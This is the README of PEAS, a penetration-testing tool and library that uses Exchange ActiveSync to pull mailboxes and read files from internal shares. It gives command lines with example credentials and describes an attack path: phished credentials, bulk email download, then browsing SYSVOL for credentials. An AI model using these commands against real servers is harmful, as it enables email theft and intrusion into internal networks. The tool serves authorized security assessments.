PEAS: Access internal fileshares through Exchange ActiveSync

PEAS is a Python 2 library and command line application for running commands on an Exchange ActiveSync server. It was created in an intern research project to assist security assessments by allowing easy access to the functionality uncovered in the research, primarily Windows file share access from outside the domain. The code is hosted on GitHub under a GPLv2 license.

Usage

PEAS can be run as a command line application or imported as a library. Run peas --help for the latest options.

Installation

PEAS can be run as a module from its directory without additional downloads as it contains its two dependancies (eas_client and pyActiveSync). It can also be installed using the following command:

python setup.py install

Check server

peas 10.207.7.100

Check credentials

peas --check -u target -p ChangeMe123 10.207.7.100

View emails

peas --emails -u target -p ChangeMe123 10.207.7.100

Save emails to directory

peas --emails -O emails -u target -p ChangeMe123 10.207.7.100

List file shares

peas --list-unc='\\test-server' -u target -p ChangeMe123 10.207.7.100

peas --list-unc='\\test-server\guestshare' -u target -p ChangeMe123 10.207.7.100

Note: Using an IP address or FQDN instead of a hostname in the UNC path is not known to work.

View file from file share

peas --dl-unc='\\test-server\guestshare\fileonguestshare.txt' -u target -p ChangeMe123 10.207.7.100

Save file from file share

peas --dl-unc='\\test-server\guestshare\fileonguestshare.txt' -o file.txt -u target -p ChangeMe123 10.207.7.100

As a library

import peas

# Create an instance of the PEAS client.
client = peas.Peas()

# Display the documentation for the PEAS client.
help(client)

# Disable certificate verification so self-signed certificates don't cause errors.
client.disable_certificate_verification()

# Set the credentials and server to connect to.
client.set_creds({
    'server': '10.207.7.100',
    'user': 'target',
    'password': 'ChangeMe123',
})

# Check the credentials are accepted.
print("Auth result:", client.check_auth())

# Retrieve a file share directory listing.
listing = client.get_unc_listing(r'\\fictitious-dc\guestshare')
print(listing)

# Retrieve emails.
emails = client.extract_emails()
print(emails)

Implementation

PEAS acts as a wrapper for the pyActiveSync and py-eas-client libraries. These libraries have been modified to extend their functionality. For ease of use, they have been included in the PEAS source tree for now.

Depending on the backend library selected after creating a PEAS instance, helper functions are called for that backend library to deliver the functionality of the PEAS client methods. The file share access functionality has only been added to pyActiveSync and going forward there is no intention to extend py-eas-client.

Significant source files

PathFunctionality
peas/__main__.py The command line application.
peas/peas.py The PEAS client class that exclusively defines the interface to PEAS.
peas/py_activesync_helper.py The helper functions that control the interface to pyActiveSync.
peas/pyActiveSync/client The pyActiveSync EAS command builders and parsers.

Field use of PEAS

PEAS can currently be used for two main attacks:

  • Extraction of mailboxes
  • Browsing and downloading files from internal fileshares

An example attack would see the operator obtaining a target's email credentials, likely through phishing. The tool could then be used for a mass download of emails from that user's account.

The emails could be parsed for UNC paths of interest and those fileshares examined. 

Alternatively, the NETLOGON and SYSVOL shares of the domain controller can be browsed for group policy preference files which may indicate fileshares of interest and potentially higher privileged credentials.

Extending

To extend the functionality of PEAS, there is a four step process:

  1. Create a builder and parser for the EAS command if it has not been implemented in pyActiveSync/client. Copying an existing source file for another command and then editing it has proved effective. The Microsoft EAS documentation describes the structure of the XML that must be created and parsed from the response.

  2. Create a helper function in py_activesync_helper.py that connects to the EAS server over HTTPS, builds and runs the command to achieve the desired functionality. Again, copying an existing function such as get_unc_listing can be effective.

  3. Create a method in the Peas class that calls the helper function to achieve the desired functionality. This is where PEAS would decide which backend helper function to call if py-eas-client was also an option.

  4. Add command line support for the feature to the PEAS application by editing peas/__main__.py. A new option should be added that when set, calls the method created in the previous step.

Limitations

PEAS has been tested on Kali 2.0 against Microsoft Exchange Server 2013 and 2016. The domain controller was Windows 2012 and the Exchange server was running on the same machine. Results with other configurations may vary.

py-eas-client support is limited to retrieving emails and causes a dependency on Twisted. It was included when the library was being evaluated but it makes sense to remove it from PEAS now, as all functionality can be provided by pyActiveSync.

The licence may be restrictive due to the inclusion of pyActiveSync, which uses the GPLv2.

The requirement to know the hostname of the target machine for file share access may impede enumeration.